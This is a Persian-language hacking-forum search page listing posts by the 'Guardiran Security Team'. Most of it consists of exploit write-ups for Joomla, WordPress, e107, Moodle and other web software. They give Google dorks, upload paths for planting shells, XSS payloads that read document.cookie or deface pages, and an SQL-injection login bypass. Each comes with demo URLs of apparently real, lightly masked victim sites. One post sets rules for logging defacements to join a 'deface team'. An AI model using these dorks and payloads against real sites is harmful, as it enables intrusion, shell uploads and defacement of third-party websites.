جستجو در تالار

در حال نمایش نتایج برای برچسب های 'تیم امنیتی گارد ایران'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

18 نتیجه پیدا شد

  1. درود دوستانی که جهت مدیریت هر بخش از انجمن با توجه به تخصص هاشون اعلام آمادگی دارند ابتدا شرایط رو از اینجا مطالعه بفرمایند و سپس در همین تاپیک تخصص خودشون و بخش مورد نظرشون رو اعلام کنند و فعالیت هاشون رو شروع کنند . با تشکر مدیریت تیم امنیتی گارد ایران .
  2. درود در این بخش لینک اثبات کلیه سایتهای هک شده توسط تیم امنیتی گارد ایران قرار می گیرند و نکات زیر رو دوستان جهت ثبت و قرار دادن لینک باید رعایت کنند : 1- هک سایتهای ایرانی ممنوع بوده و به هر عنوان به شدت برخورد خواهد شد . 2- بنام تیم امنیتی گارد ایران ثبت شوند ( در هنگام ثبت به این نام : Guardiran Security Team ) و ضمنا دوستانی که تعداد دیفیس بیشتری بنام تیم امنیتی گارد ایران داشته باشند عضو تیم دیفیس خواهند شد . با آرزوی سربلندی و موفقیت برای تمامیه اعضاء محترم تیم امنیتی گارد ایران .
  3. سلام مجدد. خوب اینم دومین باگ جوملا که اینم رده HIGH هست خدمت شما عزیزان گل تیم. ثبت اکسپلویت Joomla Remot File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110194 http://iedb.ir/exploits-4198.html ######################################################## # Exploit Title: Joomla Remot File Upload Vulnerability ######################################################## # Google Dork1: inurl:index.php?option=com_media & site:com # Google Dork2: inurl:index.php?option=com_media & site:org # Google Dork3: inurl:index.php?option=com_media & site:net # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files. # Exploit: # Add This Link After Address Target # /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # For Exmple: Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Demo: # http://drugfreeclubXsofamerica.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.saba4X215.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.johnwargoX.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= # http://www.diffhospitXal.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.smartcaXrleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://fvteamsportXs.com/joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  4. سلام خدمت دوستان عزیز گارد ایران. خوب یک دو روزی کم رنگ بودم برگشتم با ثبت دوتا باگ رده HIGH برای تیم و شما عزیزان که کلی سایت دیفیس کنین. ثبت اکسپلویت Joomla Autostand File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110195 http://iedb.ir/exploits-4199.html ######################################################## # Exploit Title: Joomla Autostand File Upload Vulnerability ######################################################## # Google Dork: inurl:/images/autostand/ # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://100cms.org/extension/joomla/4801-Autostand] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # This Is Like As RFU Bug. # You Can Upload Your Image In Your Target. # Also You Can Bypass Your Shell To .jpg Then Upload It In Target. ######################################################## # Exploit: # Add This Link To Target After This The Words: # /pt/ | /asp/ And The Other Words # {/index.php?option=com_autostand&func=newItem} ######################################################## # Demo: # http://smartXonecity.com/pt/index.php?option=com_autostand&func=newItem # http://smaXrtonecity.com/pt/index.php?option=com_autostand&func=newItem #http://www.antaresXmotors.cl/asp/index.php?option=com_autostand&func=newItem # http://autoschapaXs.com/index.php?option=com_autostand&func=newItem # http://lepetitvo.cXom/index.php?option=com_autostand&func=newItem # http://www.geeX-wagen.co.uk/index.php?option=com_autostand&func=newItem # http://www.auXtorimessafranco.com/index.php?option=com_autostand&func=newItem # http://www.fXirstcar45.fr/annonces-automobile/newitem ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  5. ثبت اکسپلویت (e107 v2 Bootstrap CMS XSS Vulnerability) به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون تیم بزررگ گارد ایران. https://cxsecurity.com/issue/WLB-2015110174 ######################################################## # Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability ######################################################## # Google Dork: Proudly powered by e107 # Date: [19/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://e107.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # CMS user details section is vulnerable to XSS. You can run XSS payloads. # XSS Vulnerability #1: # Go Update user settings page # "http://{target-url}/usersettings.php" # Set Real Name value; # "><script>alert(String.fromCharCode(88, 83, 83))</script> # or # "><script>alert(document.cookie)</script> ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  6. ثبت اکسپلویت (bisnis7/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110116 http://iedb.ir/exploits-4130.html ######################################################## # Exploit Title: bisnis7/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Bisnis7 " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://bisnis7.com.webstatsdomain.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.rumahguidXes.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.geestringXs.net/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://dumbwaiterinXdonesia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  7. ثبت اکسپلویت (StudioWeb/Cross Site Scripting(XSS به نام تیم امنیتی گارد ایران(Guardiran Security Team). https://cxsecurity.com/issue/WLB-2015110115 http://iedb.ir/exploits-4129.html ######################################################## # (Exploit Title: StudioWeb/Cross Site Scripting(XSS ######################################################## # Google Dork: inurl:"poto" intext:"powered by StudioWeb " # You Can Make Another Dork For This Bug # Date: [15/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.studioweb.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://assalamherbal222X.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.comX/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbungXalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidayX-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalboXhemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################
  8. با عرض سلام و خسته نباشید. ثبت اکسپلویت (Shop737/Cross Site Scripting(XSS توسط تیم امنیتی گارد ایران رو به تمامی اعضا محترم گارد ایران تبریک عرض میکنم. به امید موفقیت های روزافزون. https://cxsecurity.com/issue/WLB-2015110107 http://iedb.ir/exploits-4123.html ######################################################## # Exploit Title: Shop737/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:"poto" intext:"powered by Shop737" # Date: [14/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://www.shop737.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # That sites Have XSS Or Cross Site Scripting Bug. # Please Enter Dork In Google And Open Your Target. # Then add This Script # ["><marquee><h1>Hacked_By_DeMoN_guardiran.org</h1></marquee>] # In Target after Yhis Section # [index.php?imgdir=] # Then You See That Your Script Accomplished. # GooD LucK ######################################################## # Demo: # http://www.pasirindo.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://susu-bubuk.coXm/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://bestbeachbunXgalows.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.ptskk.cXom/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.goholidaXy-tour.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalbXohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E # http://www.kristalXbohemia.com/poto/index.php?imgdir=%22%3E%3Cmarquee%3E%3Ch1%3EHacked_By_DeMoN_guardiran.org%3C/h1%3E%3C/marquee%3E ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Best Friends: The First God C0d3!nj3ct!0n REX GrYpHoN BLACKH4T abarestan GooD LucK
  9. ثبت اکسپلویت Arveen Tazh Afarin CMS Login page Bypass Vulnerability به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون. یا حق https://cxsecurity.com/issue/WLB-2015110058 http://iedb.ir/exploits-4080.html ######################################################## # Exploit Title: Arveen Tazh Afarin CMS Login page Bypass Vulnerability ######################################################## # Google Dork: intext:Powered & design by ARVEEN TAZH AFARIN # Date: [08/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://arveentazh.en.ec21.com/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.You Have To Enter This Dork And Bypass The Login Page And Do Anythink In Your Target. ######################################################## # 'Username : '=''or # # 'Password : '=''or ####################################################### # Demo: # http://roudbaXrak.com/modir.php # http://ariasaXyan.ir/modir.php # http://atouXrs.ir/modir.php ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN######################################################## My Best Friends The Fitst GOD GrYpHoN BLACKH4T REX C0d3!nj3ct10n
  10. با عرض سلام و خسته نباشید. ثبت اسکپلویت Moodle cms/Cross Site Scripting(XSSبه نام تیم گارد ایران سکیوریتی تیم. https://cxsecurity.com/issue/WLB-2015110051 http://iedb.ir/exploits-4074.html ######################################################## # Exploit Title: Moodle cms/Cross Site Scripting(XSS) ######################################################## # Google Dork: inurl:/course/category.php?id= # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://moodle.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.The First Enter The Dork In Google And Open The Target. # Then Replace This Code # [/help.php?text=hecked_text] # Instead # [/course/category.php?id=] # And Replace Your Text Deface At [hecked_text] And You See That To Site Defaced With You. ######################################################## # Demo: # http://moodle.jonfila.Xcom/help.php?text=Hacked_By_DeMoN # http://elearning.noeXtic.org/help.php?text=Hacked_By_DeMoN # http://nehacert.org/Xmoodle/help.php?text=Hacked_By_DeMoN # http://dwmbeancoXunter.com/moodle/help.php?text=Hacked_By_DeMoN # http://ipesvirtual.Xdfpd.edu.uy/help.php?text=Hacked_By_DeMoN # http://clickandleXarn.bmgi.org/help.php?text=Hacked_By_DeMoN # http://learnonlxine.health.nz/help.php?text=Hacked_By_DeMoN ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ########################################################
  11. سلام خدمت اعضا محترم گارد ایران. کشف باگ Wordpress Plugin easy-comment-uploads File Upload Vulendrability توسط تیم و ثبت آن به نام گارد ایران سکیوریتی تیم(Guardiran) https://cxsecurity.com/issue/WLB-2015110049 http://iedb.ir/exploits-4073.html ######################################################## Exploit Title: Wordpress Plugin easy-comment-uploads File Upload Vulendrability # ######################################################## Google Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php # Date: [06/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor # Homepage: [https://wordpress.org/support/topic/plugin-easy-comment-uploads-got-hacked-because-of-this-plugin] Software Link: [-]# Version: [-]# Tested on: [Win 8.1/Google chrome]# CVE : [-]# ######################################################## DISCRIPTION: Hello Guys.You Can Upload Deafce Oage Or Your Shell.When You Uploaded Your Files# You Have To Go To This Section.# [/wp-content/uploads/2015/].# Please Pay Attention.Today Is 06/11/2015.If You Going To Upload Your Files In One Month Later# The Link Of Your Files Will Be# [/wp-content/uploads/2015/07].# GooD LucK My Friends.# ######################################################## Demo:# https://www.fairyhouses.Xcom/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.mukorom.inXfo/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.toiwhakaarXi.ac.nz/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.ritalee.coXm.br/blog/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.asecretgXiftbook.com/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.wildschXoenau.tv/wp-content/plugins/easy-comment-uploads/upload-form.php# http://www.nekudXathibur.com/wp-content/plugins/easy-comment-uploads/upload-form.php# ######################################################## Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T We Are Guardiran Security Team# Discovered By:DeMoN# ########################################################
  12. سلام من این برنامه رو چند ماه پیش به عشق تیم امنیتی گارد ایران نوشتم اما رفیق عزیزم پیش دستی کرد برنامه ایشون رو دیدم کامل و بی نقض بود و همینجا ازش تشکر میکنم سعی کردم این ابزار کامل باشه و تمام هش ها رو تشخیص بده حداقل چیزهای مورد نیاز رو که بهشون بر میخوریم رو تشخیص میده همونطور که گفتم این ابزار الگوریتم هش ( شناسایی نوع هش hash Identifier ) و نوع رمز نگاریشو بشما نشون میده و بعدش دیگه راحت تر میتونید هش مورد نظرتون رو کرک کنید . امیدوارم مفید واقع بشه..... پسورد : guardiran.org Guardiran Hash Identifier By REX.rar
  13. درود کشف باگ در Scopus CMS و ثبت این اکسپلویت بنام تیم امنیتی گارد ایران ( GuardIran Security Team ) و لینک اثبات رو در پایین قرار دادم : . http://vulnerability-lab.com/get_content.php?id=1436 http://iedb.ir/exploits-2759.html به امید پیشرفتهای روز افزون و بالاتر تیم امنیتی گارد ایران
  14. درود کشف باگ SQL Injection Web Vulnerability در Mangallam CMS توسط تیم امنیتی گارد ایران و لینکهای اثبات رو براتون قرار دام : . لینک اثبات exploit-db http://www.exploit-db.com/exploits/35899 لینک اثبات vulnerability-lab http://vulnerability-lab.com/get_content.php?id=1421 صفحه اکسپلویتهای ثبت شده بنام تیم امنیتی گارد ایران در vulnerability-lab.com http://vulnerability-lab.com/show.php?user=GuardIran%20Securit . با آرزوی موفقیت های روزافزون برای تمامیه اعضاء محترم تیم امنیتی گارد ایران .
  15. درود ثبت اکسپلویت Newtontree it services CMS Sql Injection Vulnerability توسط تیم امنیتی گارد ایران و جای داره از کاربر خوبمون *diamond* عزیز هم تشکر ویژه ای داشته باشیم . لینک اثبات : . http://iedb.ir/author-GuardIran%20Security%20Team.html . با آرزوی موفقیت و بهروزی برای تمامیه عزیزان در عرصه امنیت سایبرکشور
  16. کشف باگ در Blitz CMS و ثبت توسط تیم امنیتی گارد ایران . http://packetstormsecurity.com/files/129949/Blitz-CMS-SQL-Injection.html http://vulnerability-lab.com/get_content.php?id=1402 انشاا.. در فرصتهای بعدی اخبار و برخی از پروژه های تیم رو پابلیک می کنیم .
  17. ضمن عرض ادب و احترام تیم امنیتی گارد ایران در نظر دارد در بخش های نامبرده اقدام به انتخاب مدیریت بخش دارد چنانچه تمایل دارین در بخش اعلام آمادگی مدیر بخش اعلام آمادگی خوتون رو رسما اعلام بفرمایین و شما هم به جمع ما بپیوندین : 1.بخش برنامه نویسی 2.بخش الکترونیک و رباتیک 3.انجمن هکینگ و امنیت 4.تیم دیفیس 5.بخش شبکه 6.بخش گرافیک 7.موبایل 8.سخت افزار 9.اکسپلویت نویسی 10.ویروس .تروجان . کیلاگر 11.تیم ترجمه 12. تیم مجله علمی شرایط لازم جهت مدیریت بخش ( مدیر شدن در هر بخش از انجمن ) : - فعالیت مفید : منظور از فعالیت Copy Paste کردن متون از دیگر تیمها و یا دیگر سایتها نيست . -حضور در ساعاتی از روز و نظارت به پستهای ارسالی کاربران در انجمن . -هیچگونه آشناییت قبلی و رفاقت در ابن موضوع دخیل نخواهد بود . - قدیمی بودن عضویت کاربران برای این انتخاب مد نظر نیست . - تخصص کامل در زمینه آن بخشی که انتخاب می کنید . - فعال نبودن در دیگر گروه ها و یا سایت های امنیتی . - داشتن اخلاق نیک و برخورد مناسب و پرهیز از هر گونه حاشیه های اخلاقی , مذهبی , سیاسی , اعتقادی و.. . عزیزانی که شرایط لازم را دارا می باشند لطفا در اینجا آمادگی خودشون رو رسما اعلام کنند . با آرزوی موفقیت و سربلندی برای تمامیه عزیزان در عرصه امنیتی ایران عزیز .
  18. درود ضمن عرض ادب و ارادت بنده به نوبه خودم این عید خجسته و پربرکت غدیر خم را به تمامیه شیعیان جهان تبریک و تهنیت عرض می نمایم بالاخص اعضاء محترم و خوب تیم امنیتی گارد ایران و امید است در سایه آن امام والامقام همگی موفق و شادکادم و بهروزتر از هر روزتون باشید . یا علی مدد -